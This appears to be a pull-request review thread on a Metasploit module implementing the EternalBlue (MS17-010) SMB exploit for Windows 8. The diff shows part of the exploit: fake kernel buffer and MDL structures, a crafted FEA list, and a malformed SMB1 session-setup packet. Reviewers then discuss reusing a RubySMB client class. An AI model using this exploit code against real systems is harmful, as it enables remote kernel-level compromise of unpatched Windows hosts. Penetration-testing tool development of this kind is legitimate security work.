modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb

```diff
@@ -0,0 +1,893 @@
+    fake_srv_net_buffer_x64nx += [0, TARGET_HAL_HEAP_ADDR].pack('QQ<') # _, _, pointer to fake struct
+    fake_srv_net_buffer_x64nx += [0, 0,].pack('QQ<')
+    fake_srv_net_buffer_x64nx += "\x00" * 16
+    fake_srv_net_buffer_x64nx += "\x00" * 16
+    fake_srv_net_buffer_x64nx += [0, 0x60, 0x1004, 0].pack('QSSI<') # MDL.Next, MDL.Size, MDL.MdlFlags
+    fake_srv_net_buffer_x64nx += [0, pte_addr + 7 - 0x7f].pack('QQ<') # MDL.Process, MDL.MappedSystemVa
+
+    fea_list_nx = [0x10000].pack('I<')
+    fea_list_nx += NTFEA_9000
+    fea_list_nx += [0, 0, fake_srv_net_buffer_x64nx.length - 1].pack('CCS<') + fake_srv_net_buffer_x64nx # -1 because first '\x00' is for name
+    # stop copying by invalid flag (can be any value except 0 and 0x80)
+    fea_list_nx += [0x12, 0x34, 0x5678].pack('CCS<')
+
+    fea_list_nx
+  end
+
+  def default_session_setup_request
+    p = RubySMB::SMB1::Packet::SessionSetupRequest.new
+    p.parameter_block.max_buffer_size = 61440
+    p.parameter_block.max_mpx_count = 50
+    p.smb_header.flags2.extended_security = 1
+
+    p
+  end
+
+  # Returns the value to be passed to SMB clients for
+  # the password. If the user has not supplied a password
+  # it returns an empty string to trigger an anonymous
+  # logon.
+  #
+  # @return [String] the password value
+  def smb_pass
+    if datastore['SMBPass'].present?
+      datastore['SMBPass']
+    else
+      ''
+    end
+  end
+
+  # Returns the value to be passed to SMB clients for
+  # the username. If the user has not supplied a username
+  # it returns an empty string to trigger an anonymous
+  # logon.
+  #
+  # @return [String] the username value
+  def smb_user
+    if datastore['SMBUser'].present?
+      datastore['SMBUser']
+    else
+      ''
+    end
+  end
+
+  # Returns the value to be passed to SMB clients for
+  # the domain. If the user has not supplied a domain
+  # it returns an empty string to trigger an anonymous
+  # logon.
+  #
+  # @return [String] the domain value
+  def smb_domain
+    if datastore['SMBDomain'].present?
+      datastore['SMBDomain']
+    else
+      ''
+    end
+  end
+
+  class SessionSetupSMB1RequestWithPoorlyFormedDataBlock < RubySMB::GenericPacket
+    COMMAND = RubySMB::SMB1::Commands::SMB_COM_SESSION_SETUP_ANDX
+
+    class ParameterBlock < RubySMB::SMB1::Packet::SessionSetupRequest::ParameterBlock
+    end
+
+    class DataBlock < RubySMB::SMB1::DataBlock
+      # Key difference for this class is that the length of security_blob is NOT dictated by the value of
+      # security_blob_length in the +SessionSetupRequest::ParameterBlock+
+      string :security_blob, label: 'Security Blob (GSS-API)'
+      string :native_os, label: 'Native OS'
+      string :native_lan_man, label: 'Native LAN Manager'
+    end
+
+    smb_header :smb_header
+    parameter_block :parameter_block
+    data_block :data_block
+  end
+
+  class CustomSessionSetupPacketRubySMBClient < ::RubySMB::Client
+    def send_recv(packet, encrypt: false)
```

Comment:
Just to confirm, do we need all of this code copy/pasted from ruby smb? I can't remember the specifics, but I seem to remember that the last time we synced up we might be able to use something like this:

```ruby
class MyClient < RubySmbClient
   def initialize(...normal options..., some_new_packet:)
      super(... normal options...)
      @some_new_packet = some_new_packet
   end

   # Override only the part we're changing the behavior of
   def some_ssp_authentication_stuff
       @some_new_packet.do_stuff
       @some_new_packet
   end
end
```

Calling code:

```
client = MyClient.new(..., some_new_packet: default_session_setup_request)
```

Reply:
Or do only _some_ requests need custom ssp packets?